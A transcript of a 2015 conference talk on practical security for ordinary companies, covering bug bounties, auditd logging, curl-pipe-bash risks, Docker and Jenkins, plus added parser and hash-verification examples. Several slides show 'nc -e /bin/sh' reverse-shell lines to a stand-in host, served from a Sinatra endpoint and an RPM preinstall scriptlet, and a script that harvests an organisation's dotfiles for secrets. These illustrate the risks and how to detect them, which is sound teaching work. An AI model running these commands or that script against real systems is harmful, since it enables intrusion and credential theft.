
Security for non-Unicorns!

Bea Hughes
October 22, 2015

LASCON 2015

Security for the rest of us.

Transcript

  1. PETE ALREADY GAVE MY TALK AS A KEYNOTE ):
     — @benjammingh for LasCon 2015
  2. WHO'S THIS CLOWN?
     ▸ Infrastructure security at Etsy.
     ▸ Recovered operations monkey at Puppet Labs.
     ▸ Own a lot of black t-shirts.
     ▸ Had 1300 accounts on his high school Linux system. (:
     https://twitter.com/skullmandible/status/411281851131523072
  3. SETLIST
     ▸ Intros. (you are here).
     ▸ Frame the problem, why am I here.
     ▸ Things from the real world(™) & how to cope.
     ▸ Far far too many summaries.
     ▸ Wings, moonshine and dancing? (I have no idea)
  4. FROM TINY SEEDS, DO MIGHTY ACORNS GROW.
     ▸ PinkiePwn's 6 tiny bugs in Chrome to full sandbox escape.
     ▸ Egor Homakov's 5 small bugs in GitHub to full private access on GitHub.
     ▸ XSS to remote code execution in under an hour.
     ▸ Username & password from HVAC system leads to
  5. COMPUTERISING IS HARD.
     No. 1 takeaway for security types is a sense of perspective. (maybe even humility! gasp)
  6. SECURITY PEOPLE AREN'T GREAT SECURE CODERS.
     ▸ Snort: 10 CVEs, Wireshark: 322! CVEs
     ▸ Security Firm Bit9 Hacked, Used to Spread Malware
     ▸ Joxean Koret on Breaking Antivirus software
     ▸ Tavis from Project Zero on exploiting ESET
     ▸ BEST! FireEye just running Apache/PHP as root!
  7. SO WHO DO I TRUST?
     ▸ No one? Always a great position for security people who don't want to get paid.
     ▸ Everyone? Do I have some emails with funny cats for you to click on.
     ▸ Security vendors? If you have infinite money and no attackers.
     ▸ Attackers!
  8. "YOU'RE ALREADY BEING PROBED FOR SECURITY HOLES, DO YOU WANT TO KNOW OR NOT?"
  9. BUG BOUNTIES 103: THE FIRST FEW WEEKS WILL BE HELL.
  10. terrible bash example (don't do this)

     # Step 1 (commented out): clone every org member's public dotfiles repo.
     # for i in $(curl --silent 'https://api.github.com/orgs/<target>/members' \
     #            | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \
     # do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \
     #      git clone https://github.com/$i/dotfiles.git $i ) \
     # ; done

     # Step 2: grep every revision of every clone for the pattern given as $1.
     for i in * ; do
       [ -d "$i/.git" ] || continue
       cd "$i"
       for revision in $(git rev-list --all) ; do
         unset PAGER
         export GIT_PAGER=""
         # find . -iname \*.key -or -iname \*.pem
         out="$(git grep -i -E "$1" ${revision} )"
         if [ $? -eq 0 ] ; then
           echo "${out}" | LANG="C" sed "s/^/$i: /"
         fi
       done
       cd ..
     done
  11. AUDITD
     Auditd is the best way to get command execution logged in your infrastructure.
  12. AUDITD
     Auditd is the worst way to get this information to a log file.

     type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000....
     type=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl"
     type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax"
     type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
     type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
     type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
  13. WHY?
     "Why are the logs multiline?" -- David Shing, aka "Shingy", aka "The Shing", aka "AOL's
  14. MULTILINE LOGS ARE THE SPAWN OF THE DEVIL
     ORACLE'S JAVA
  15. COPING WITH MULTILINE AUDITD
     ▸ ELK: multiline filter in Logstash.
     ▸ Other: github/gdestuynder/Audisp-json
     ▸ Have cash, want a decent GUI (and more): Go use Threatstack!
     ▸ Write something yourself in python & golang: I keep promising to OSS this ):
  16. ALERT ON SKETCHY THINGS. (ASSUMES ELK)
     1. Elastalert from Yelp
     2. Alert on "/bin/nc *-e /bin/sh*"
     3. You will now find when someone tries to run a reverse shell!
     4. Or when your ops people do fun things.
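The AUDITD slides show why the raw records are painful, COPING WITH MULTILINE AUDITD says to stitch them back together, and ALERT ON SKETCHY THINGS alerts on the glob "/bin/nc *-e /bin/sh*". The following is an added Python example (not code from the talk) that does both: it groups records by audit id, rebuilds argv from the EXECVE record, and applies the deck's alert rule. The first event is the perl one from the slide; the two nc events, their uids and the hex-encoded argument are constructed. It also decodes auditd's hex encoding of arguments containing spaces, which the slide does not show but which a `bash -c "..."` wrapper triggers.

```python
"""Added example: stitch multiline auditd output into one event per audit id,
rebuild argv, and apply the deck's reverse-shell glob. Sample data is constructed."""
import re
from collections import OrderedDict
from fnmatch import fnmatchcase

# auditd hex-encodes an execve argument that contains spaces or quotes. This is
# what a constructed `bash -c "/bin/nc -e /bin/sh root.legit.pw 2222"` produces.
HEX_ARG = "/bin/nc -e /bin/sh root.legit.pw 2222".encode().hex().upper()

# Constructed sample log: the perl event from the slide plus two constructed events.
SAMPLE_LOG = f"""\
type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000
type=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl"
type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax"
type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
type=SYSCALL msg=audit(124:3020172): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=9300 pid=9301 auid=1001 uid=1001
type=EXECVE msg=audit(124:3020172): argc=5 a0="/bin/nc" a1="-e" a2="/bin/sh" a3="root.legit.pw" a4="2222"
type=CWD msg=audit(124:3020172): cwd="/tmp"
type=SYSCALL msg=audit(125:3020173): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=9400 pid=9401 auid=1001 uid=1001
type=EXECVE msg=audit(125:3020173): argc=3 a0="/bin/bash" a1="-c" a2={HEX_ARG}
type=CWD msg=audit(125:3020173): cwd="/tmp"
"""

# type=<TYPE> msg=audit(<timestamp>:<id>): <key=value ...>
RECORD_RE = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<id>\d+)\): (?P<body>.*)$")
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')   # quoted or bare values
ARG_RE = re.compile(r"^a\d+$")                             # a0, a1, ... execve args


def parse_fields(body):
    """key=value pairs; unquoted execve args that are pure hex are auditd's encoding."""
    fields = {}
    for key, value in FIELD_RE.findall(body):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        elif ARG_RE.match(key) and re.fullmatch(r"(?:[0-9A-F]{2})+", value):
            value = bytes.fromhex(value).decode("utf-8", "replace")
        fields[key] = value
    return fields


def stitch_events(lines):
    """Group records sharing an audit id into one event, keeping arrival order."""
    events = OrderedDict()
    for line in lines:
        m = RECORD_RE.match(line.strip())
        if not m:
            continue  # blank or non-audit line
        ev = events.setdefault(m["id"], {"id": m["id"], "ts": m["ts"], "records": []})
        ev["records"].append((m["type"], parse_fields(m["body"])))
    return list(events.values())


def field(event, rtype, key, default=None):
    for t, fields in event["records"]:
        if t == rtype and key in fields:
            return fields[key]
    return default


def execve_argv(event):
    """Rebuild argv from the EXECVE record's a0..aN, in order, argc entries long."""
    for rtype, fields in event["records"]:
        if rtype == "EXECVE":
            return [fields.get(f"a{i}", "") for i in range(int(fields.get("argc", 0)))]
    return []


def summarize(event):
    """One flat, single-line-friendly dict per event: the point of the stitching."""
    argv = execve_argv(event)
    return {"id": event["id"], "auid": field(event, "SYSCALL", "auid"),
            "uid": field(event, "SYSCALL", "uid"), "pid": field(event, "SYSCALL", "pid"),
            "cwd": field(event, "CWD", "cwd"), "argv": argv, "cmdline": " ".join(argv)}


REVERSE_SHELL_RULE = "/bin/nc *-e /bin/sh*"   # the glob the deck alerts on


def matches_rule(summary, rule=REVERSE_SHELL_RULE):
    """Apply the glob to the full command line and to each argument, so the same
    command hidden inside a `bash -c "..."` wrapper is caught as well."""
    return any(fnmatchcase(c, rule) for c in [summary["cmdline"]] + summary["argv"])


def alerts(log_text):
    return [s for s in map(summarize, stitch_events(log_text.splitlines())) if matches_rule(s)]


if __name__ == "__main__":
    for hit in alerts(SAMPLE_LOG):
        print(f"ALERT audit id {hit['id']} auid={hit['auid']} cwd={hit['cwd']}: {hit['cmdline']}")
```

Feeding the flattened dicts to Elastalert (or anything else) is then one event per line, which is all the multiline filter in Logstash is trying to achieve.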
  17. SINATRA EXAMPLE

     get '/install.sh' do
       if request.env['HTTP_USER_AGENT'] =~ /curl/
         return 'nc -e /bin/sh root.legit.pw 2222 &'
       else
         return print_install_code()
       end
     end
  18. SINATRA EXAMPLE 2: PAYBACK

     get '/install.sh' do
       ip = request.env['HTTP_CLIENT_IP']
       if seen_before.include? ip
         return print_install_code()
       else
         seen_before << ip
         return 'nc -e /bin/sh root.legit.pw 2222 &'
       end
     end
  19. CURL | BASH
     "BUT THIS IS NO WORSE THAN PACKAGES."

     foo$ sudo yum install sketchy
     foo$ sudo aptitude install sketchy
  20. CURL | BASH
     "but worse than downloading RPMs from a random site?"

     foo$ rpm --verify --check-sigs sketchy.1.33-7.rpm
     foo$ dpkg-sig --verify sketchy.1.33-7.deb
  21. CURL | BASH

     root# rpm -qp --scripts sketchy-1.33-7.rpm
     preinstall scriptlet (using /bin/sh):
     bash -c 'while : ; \
     do \
     nc -e /bin/sh root.legit.pw 2222 ;\
     done'
  22. VERIFIABLE
     This doesn't exist:
     foo$ curl legit.pw/sketch.sh | sudo sh --gpg-verify

     No one has ever done this:
     foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh
  23. CURL | BASH
     "But I trust HTTPS"
     ▸ HTTPS certs cost ~$6.
     ▸ If I can't make $6 by owning a system, I should probably stop being an attacker.
     ▸ @letsencrypt will soon make this free.
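The VERIFIABLE slide's point is that the pipe itself is the problem: with `curl ... | sudo sh` the bytes that get checked (if anything checks them) are not provably the bytes that get executed, and HTTPS only tells you who served them. Below is an added shell example, not from the deck, of the "download, verify, then run" shape. The deck's check is `gpg --verify`; this version swaps in a pinned SHA-256 published out of band, because that demonstrates the same control without key material. The URL and digest in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example: replace `curl URL | sh` with download -> verify -> execute.
# The digest is assumed to be published out of band (release notes, a signed
# page, a colleague); the hash pin stands in for the deck's gpg --verify.
set -eu

# SHA-256 of a file, portable across coreutils (sha256sum) and BSD/macOS (shasum).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f 1
    else
        shasum -a 256 "$1" | cut -d ' ' -f 1
    fi
}

# verify_then_run FILE EXPECTED_SHA256 [INTERPRETER]
# Executes FILE only when its digest matches EXPECTED_SHA256; on mismatch it
# prints both digests to stderr, returns 1 and leaves the file for inspection.
verify_then_run() {
    file=$1
    expected=$2
    interp=${3:-sh}
    actual=$(file_sha256 "$file")
    if [ "$actual" != "$expected" ]; then
        echo "refusing to run $file: sha256 $actual does not match expected $expected" >&2
        return 1
    fi
    "$interp" "$file"
}

# fetch_verify_run URL EXPECTED_SHA256
# Download to a temp file first so the bytes checked are the bytes executed,
# which a pipe cannot guarantee. -f makes curl fail on an HTTP error instead
# of handing an error page to the interpreter.
fetch_verify_run() {
    url=$1
    expected=$2
    tmp=$(mktemp)
    trap 'rm -f "$tmp"' EXIT
    curl -sSfL -o "$tmp" "$url"
    verify_then_run "$tmp" "$expected"
}

# Usage (placeholder URL and digest, not real values):
#   fetch_verify_run https://example.invalid/install.sh <sha256 published out of band>
```

The same shape works with `gpg --verify install.sh.asc install.sh` in place of the digest comparison once you have the signer's key; the important part is that verification happens on a file you then execute, not on a stream you have already started executing.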
  24. >30% OF IMAGES IN DOCKER HUB CONTAIN HIGH PRIORITY SECURITY VULNS
     - JAYANTH GUMMARAJU, TARUN DESIKAN AND YOSHIO TURNER FROM BANYANOPS
  25. BUT IS DOCKER ITSELF SECURE?
     ▸ Don't run things as root.
     ▸ No really, stop running things as root.
     ▸ Did I mention not running things as root.
     ▸ It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)
  26. SECURIFY THE DOCKER.
     ▸ Don't use --privileged.
     ▸ Use --cap-drop all and --cap-add <thing> to get the minimum capabilities.
     ▸ Use Docker Notary
     ▸ Use GRSecurity (just do that anyway, if you can.)
     ▸ Use SELinux... I may as well ask for a pony here.
  27. THREAT MODELLING FOR BEGINNERS
     1. what are you actually defending against?
     2. from whom?
     3. for how much?
  28. <PINCH OF SALT GOES HERE>
     ▸ I am not saying Docker is ZOMG unhackable.
     ▸ it's just cgroups and namespacing. (just)
     ▸ Escapes will happen.
     ▸ They have a rad security team (Hi @diogomonica and @nathanmccauley)
  29. UNPINCHOFSALTD
     ▸ You can use it in a way that is secure, enough.
     ▸ network separation & segregation still works.
     ▸ secrets/credentials still a bigger problem.
     ▸ PLEASE don't just adopt it because it's new & shiny.
     ▸ unikernels ✨
  30. ITS ENTIRE JOB IS TO TAKE ARBITRARY CODE AND RUN IT, WITH ACCESS TO SOME SECRET/CREDENTIAL DATA.
  31. OLD CRUFTY CONFIGS + ALL YOUR CODE & SECRETS
  32. RCE as a service
     [6] Hacking Jenkins Servers With No Password
  33. MAKE JENKINS SUCK FEWER
     * DISABLE EXECUTION ON THE MASTER JENKINS HOST.
     * DISABLE ANONYMOUS ACCESS.
     * (USE TRAVIS, IF YOU CAN)
  34. BUT WHAT IF JENKINS COULD BE HARNESSED FOR GOOD?
  35. NOT STOLEN FROM NickG's old 2012 deck.
     [7] Thanks Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security
  36. JENKINS AS A FORCE FOR [SECURITY] GOOD
     ▸ Gauntlt "be mean to your code"
     ▸ https://github.com/secure-pipeline
     ▸ Even Adobe blog on secure software, zomg!
  37. SUMMARY
     ▸ Computers are apparently hard.
     ▸ Security is clearly harder still, obv.
     ▸ Actually trust and humans is hard.
     ▸ The typing is the easy bit. (ish)
  38. MORE SUMMARY
     ▸ Complex systems lead to much more complex security problems. (see OAuth)
     ▸ Annual pen-tests don't scale, bug bounties can help.
     ▸ Attackers are mining any public info you have (GitHub, S3, pastebin?)
     ▸ No really, go check all your S3 buckets...
  39. WILL THERE BE A SUMMARY OF SUMMARIES?
     ▸ I beg you to stop trusting curl.
     ▸ Auditd is awful, but it can be fewer awful.
     ▸ Jenkins, you probably have to have one.
     ▸ but that can be okay, nay, even useful for security.
  40. A SUMMARY APPEARED, WHAT HAPPENED NEXT WILL SHOCK YOU
     ▸ Docker and security can be used in the same sentence.
     ▸ Understand your threat model (Apple's guide)
     ▸ Don't be a FireEye, stop running things as root.
  41. THANK YOU
     ▸ Twidder: @benjammingh
     ▸ LinkedIn: lnkdin.me/p/benyeah
     ▸ FidoNet: 2:254/524.13
     ▸ JitHub: github.com/barn
     ▸ SpeakerDeck: speakerdeck.com/barnbarn
     ▸ Etsy: Careers <--- CodeAsCraft <--- our blog